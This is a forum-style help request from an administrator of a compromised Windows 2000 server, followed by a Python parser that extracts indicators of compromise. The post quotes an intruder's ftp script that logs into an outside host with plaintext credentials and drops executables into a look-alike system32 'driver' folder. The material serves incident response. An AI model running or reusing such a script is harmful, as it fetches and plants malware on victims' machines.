I am running Windows 2000 Advanced Server with IIS, ColdFusion, SQL Server 2000, ZoneAlarm file, a Netopia Cayman 5300 series router and Remote Admin. I just noticed a file C:\MSSQL_Script.txt which is requesting FTP access to download some malicious files. My questions:
I rebuilt my PC from a backup, but the file just re-appeared again.
1) Does anyone know how they might have gotten in? I only have ports 80, 443, 20 and 21 open. 2) How do hackers schedule jobs? Because I did notice a recp.exe program requesting access also. 3) Can someone help with the next steps I need to take? Thanks
Content of the file (one FTP command per line, as the ftp client reads it):
open ftp.cybton.com
USER mkeoma uvrlSN
USER mkeoma uvrlSN
binary
get /mowl/MSIntskmngr.exe C:\winnt\system32\driver\MSIntskmngr.exe
get /mowl/mspaintfixd.tmp C:\winnt\system32\driver\mspaintfixd.tmp
get /mowl/net.exe C:\winnt\system32\driver\net.exe
get /mowl/notepadc.xcl C:\winnt\system32\driver\notepadc.xcl
quit
open ftp.cybton.com
USER eazy VEDgFT
binary
get /mowl/MSIntskmngr.exe C:\winnt\system32\driver\MSIntskmngr.exe
get /mowl/mspaintfixd.tmp C:\winnt\system32\driver\mspaintfixd.tmp
get /mowl/net.exe C:\winnt\system32\driver\net.exe
get /mowl/notepadc.xcl C:\winnt\system32\driver\notepadc.xcl
quit
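The file in the post is a Windows ftp command script of the kind an intruder runs non-interactively with `ftp -s:<file>`. The following parser, added here as an example and not part of the original post, pulls the indicators an incident responder would want out of such a script: the FTP server contacted, the accounts used, the remote files fetched and the local paths they are written to. The sample input is constructed from the posted script with the passwords replaced by the placeholder `REDACTED`; the hostname, usernames and paths are those from the post. The `suspicious_drops` heuristic and its list of standard directory names are assumptions for illustration, based on the fact that the real Windows driver directory is `system32\drivers`, not `system32\driver`.

```python
"""Extract indicators of compromise from a Windows ftp -s: command script."""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sample: the script from the post, one command per line,
# passwords replaced by REDACTED. Raw string so backslashes stay literal.
SAMPLE_SCRIPT = r"""
open ftp.cybton.com
USER mkeoma REDACTED
USER mkeoma REDACTED
binary
get /mowl/MSIntskmngr.exe C:\winnt\system32\driver\MSIntskmngr.exe
get /mowl/mspaintfixd.tmp C:\winnt\system32\driver\mspaintfixd.tmp
get /mowl/net.exe C:\winnt\system32\driver\net.exe
get /mowl/notepadc.xcl C:\winnt\system32\driver\notepadc.xcl
quit
open ftp.cybton.com
USER eazy REDACTED
binary
get /mowl/MSIntskmngr.exe C:\winnt\system32\driver\MSIntskmngr.exe
get /mowl/mspaintfixd.tmp C:\winnt\system32\driver\mspaintfixd.tmp
get /mowl/net.exe C:\winnt\system32\driver\net.exe
get /mowl/notepadc.xcl C:\winnt\system32\driver\notepadc.xcl
quit
"""

# Directory names that legitimately exist directly under system32 on
# Windows 2000 (assumed list for the heuristic; extend as needed).
KNOWN_SYSTEM32_SUBDIRS = {"drivers", "config", "spool", "inetsrv", "wbem"}


@dataclass
class FtpSession:
    """One 'open ... quit' block of the script."""
    host: str
    credentials: List[Tuple[str, str]] = field(default_factory=list)
    transfers: List[Tuple[str, str]] = field(default_factory=list)  # (remote, local)


def parse_ftp_script(text: str) -> List[FtpSession]:
    """Walk the script line by line and group commands into sessions."""
    sessions: List[FtpSession] = []
    current: Optional[FtpSession] = None
    for raw in text.splitlines():
        parts = raw.strip().split()
        if not parts:
            continue
        cmd, args = parts[0].lower(), parts[1:]
        if cmd == "open" and args:
            current = FtpSession(host=args[0])
            sessions.append(current)
        elif current is None:
            continue  # commands before any 'open' belong to no session
        elif cmd == "user" and args:
            # 'USER name pass' on one line: the password is passed in the clear
            current.credentials.append((args[0], args[1] if len(args) > 1 else ""))
        elif cmd in ("get", "recv") and args:
            remote = args[0]
            # Without a local name ftp saves under the remote basename
            local = args[1] if len(args) > 1 else remote.rsplit("/", 1)[-1]
            current.transfers.append((remote, local))
        elif cmd in ("quit", "bye"):
            current = None
    return sessions


def indicators(sessions: List[FtpSession]) -> Dict[str, List[str]]:
    """De-duplicated hosts, accounts, remote files and local drop paths."""
    return {
        "hosts": sorted({s.host for s in sessions}),
        "users": sorted({u for s in sessions for u, _ in s.credentials}),
        "remote_paths": sorted({r for s in sessions for r, _ in s.transfers}),
        "local_paths": sorted({l for s in sessions for _, l in s.transfers}),
    }


def suspicious_drops(sessions: List[FtpSession]) -> List[str]:
    """Local paths written into a system32 subdirectory that is not a
    standard one (e.g. 'driver' mimicking 'drivers')."""
    hits = []
    for path in indicators(sessions)["local_paths"]:
        segs = path.replace("/", "\\").lower().split("\\")
        if "system32" in segs:
            i = segs.index("system32")
            # a subdirectory exists only if something follows system32 besides the filename
            if len(segs) > i + 2 and segs[i + 1] not in KNOWN_SYSTEM32_SUBDIRS:
                hits.append(path)
    return hits


if __name__ == "__main__":
    found = parse_ftp_script(SAMPLE_SCRIPT)
    for key, values in indicators(found).items():
        print(f"{key}: {values}")
    print("suspicious drop locations:", suspicious_drops(found))
```

Run it against the recovered script file (`parse_ftp_script(open(path).read())`) and feed the host, the remote `/mowl/` paths and the four local paths into whatever the firewall and file-system search can block or look for; the session grouping also tells you which credentials were actually used for which downloads.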